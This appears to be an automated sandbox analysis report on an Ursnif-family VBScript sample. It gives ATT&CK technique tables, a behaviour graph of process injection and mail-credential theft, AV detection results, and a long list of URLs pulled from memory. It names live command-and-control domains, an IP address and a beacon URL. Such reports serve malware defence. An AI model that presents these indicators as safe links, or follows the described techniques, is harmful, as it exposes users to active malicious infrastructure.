            Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection812Scripting121Credential API Hooking3File and Directory Discovery3Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information2LSASS MemorySystem Information Discovery26Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)File Deletion1Security Account ManagerQuery Registry1SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSSecurity Software Discovery331Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
            Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion4Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection812DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 322273 Sample: 0xyZ4rY0opA2.vbs Startdate: 24/11/2020 Architecture: WINDOWS Score: 100 91 Multi AV Scanner detection for domain / URL 2->91 93 Antivirus detection for dropped file 2->93 95 Multi AV Scanner detection for dropped file 2->95 97 14 other signatures 2->97 8 mshta.exe 19 2->8         started        11 wscript.exe 2 8 2->11         started        14 iexplore.exe 1 73 2->14         started        16 2 other processes 2->16 process3 file4 107 Suspicious powershell command line found 8->107 18 powershell.exe 2 32 8->18         started        67 C:\Users\user\AppData\Local\...\earmark.avchd, PE32 11->67 dropped 69 C:\Users\user\AppData\Local\...\Ammerman.zip, Zip 11->69 dropped 109 Benign windows process drops PE files 11->109 111 VBScript performs obfuscated calls to suspicious functions 11->111 113 Deletes itself after installation 11->113 115 2 other signatures 11->115 22 iexplore.exe 30 14->22         started        25 iexplore.exe 30 16->25         started        27 iexplore.exe 30 16->27         started        29 rundll32.exe 16->29         started        signatures5 process6 dnsIp7 59 C:\Users\user\AppData\...\xuilsqrn.cmdline, UTF-8 18->59 dropped 61 C:\Users\user\AppData\Local\...\iaweong2.0.cs, UTF-8 18->61 dropped 99 Injects code into the Windows Explorer (explorer.exe) 18->99 101 Writes to foreign memory regions 18->101 103 Modifies the context of a thread in another process (thread injection) 18->103 105 3 other signatures 18->105 31 explorer.exe 18->31 injected 35 csc.exe 18->35         started        38 csc.exe 18->38         started        40 conhost.exe 18->40         started        71 api10.laptok.at 47.241.19.44, 49739, 49740, 49764 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 22->71 42 nslookup.exe 22->42         started        44 conhost.exe 22->44         started        file8 signatures9 process10 dnsIp11 73 c56.lepini.at 31->73 75 api3.lepini.at 31->75 83 Tries to steal Mail credentials (via file access) 31->83 85 Changes memory attributes in foreign processes to executable or writable 31->85 87 Writes to foreign memory regions 31->87 89 5 other signatures 31->89 46 cmd.exe 31->46         started        49 RuntimeBroker.exe 31->49 injected 51 RuntimeBroker.exe 31->51 injected 53 RuntimeBroker.exe 31->53 injected 63 C:\Users\user\AppData\Local\...\xuilsqrn.dll, PE32 35->63 dropped 55 cvtres.exe 35->55         started        65 C:\Users\user\AppData\Local\...\iaweong2.dll, PE32 38->65 dropped 57 cvtres.exe 38->57         started        77 222.222.67.208.in-addr.arpa 42->77 79 192.168.2.1 unknown unknown 42->79 81 2 other IPs or domains 42->81 file12 signatures13 process14 signatures15 117 Uses nslookup.exe to query domains 46->117

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            0xyZ4rY0opA2.vbs22%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\earmark.avchd100%AviraTR/Crypt.XDR.Gen
            C:\Users\user\AppData\Local\Temp\earmark.avchd100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\earmark.avchd32%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\earmark.avchd90%ReversingLabsWin32.Trojan.Ursnif

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            c56.lepini.at12%VirustotalBrowse
            api3.lepini.at11%VirustotalBrowse
            api10.laptok.at12%VirustotalBrowse
            222.222.67.208.in-addr.arpa2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://api3.lepini.at/api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v0%Avira URL Cloudsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://search.orange.co.uk/favicon.ico0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            myip.opendns.com
            84.17.52.25
            truefalse
              high
              c56.lepini.at
              47.241.19.44
              truetrueunknown
              resolver1.opendns.com
              208.67.222.222
              truefalse
                high
                api3.lepini.at
                47.241.19.44
                truefalseunknown
                api10.laptok.at
                47.241.19.44
                truefalseunknown
                222.222.67.208.in-addr.arpa
                unknown
                unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://api3.lepini.at/api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7vfalse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://search.chol.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                  high
                  http://www.mercadolivre.com.br/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://search.ebay.de/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                    high
                    http://www.mtv.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                      high
                      http://www.rambler.ru/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                        high
                        http://www.nifty.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                          high
                          http://www.dailymail.co.uk/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www3.fnac.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                            high
                            http://buscar.ya.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                              high
                              http://search.yahoo.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                high
                                http://constitution.org/usdeclar.txtC:powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://https://file://USER.ID%lu.exe/updpowershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                low
                                http://www.sogou.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://asp.usatoday.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                      high
                                      http://fr.search.yahoo.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                        high
                                        http://rover.ebay.comexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                          high
                                          http://in.search.yahoo.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                            high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                              high
                                              http://search.ebay.in/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                high
                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://msk.afisha.ru/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000018.00000002.926126421.000001B497681000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://search.rediff.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.ya.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.naver.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.google.ru/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.daum.net/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Iconpowershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://buscar.ozu.es/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://kr.search.yahoo.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://search.about.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://busca.igbusca.com.br/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.ask.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.priceminister.com/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.cjmall.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.centrum.cz/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.carterandcone.comlexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://suche.t-online.de/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.google.it/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.auction.co.kr/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ceneo.pl/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.amazon.de/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://sads.myspace.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://search.sify.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.ebay.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://search.nifty.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.google.si/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.google.cz/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.soso.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.univision.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.ebay.it/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                  high
